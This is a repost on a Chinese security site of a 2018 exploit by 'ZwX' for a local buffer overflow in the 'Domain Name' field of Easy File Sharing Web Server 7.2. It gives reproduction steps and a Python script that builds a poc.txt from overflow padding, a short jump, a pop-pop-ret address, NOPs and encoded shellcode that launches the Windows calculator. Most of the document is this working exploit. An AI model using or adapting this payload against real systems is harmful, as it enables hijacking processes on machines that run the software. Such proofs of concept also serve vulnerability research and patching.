首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy File Sharing Web Server 7.2 Domain Name Buffer Overflow
来源:http://zwx-pentester.fr/ 作者:ZwX 发布时间:2018-10-08  
#--------------------------------------------------------#
#Exploit Title: Easy File Sharing Web Server 7.2 - 'Domain Name' Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-09-19
#Vendor Homepage : http://www.sharing-file.com/
#Link Software : http://www.sharing-file.com/efssetup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/
#--------------------------------------------------------#

'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.


Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)"
4.Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK"
5.Now the calculator executes!
'''

#!/usr/bin/python

from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ISPConfig < 3.1.13 - Remote Co
·Windows Net-NTLMv2 Reflection
·NICO-FTP 3.0.1.19 - Buffer Ove
·Navigate CMS Unauthenticated R
·FTP Voyager 16.2.0 - Denial of
·Zahir Enterprise Plus 6 Stack
·H2 Database 1.4.196 - Remote C
·Unitrends UEB HTTP API Remote
·Zahir Enterprise Plus 6 build
·Snes9K 0.0.9z - Denial of Serv
·FLIR Thermal Traffic Cameras 1
·Linux Kernel 2.6.x / 3.10.x /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved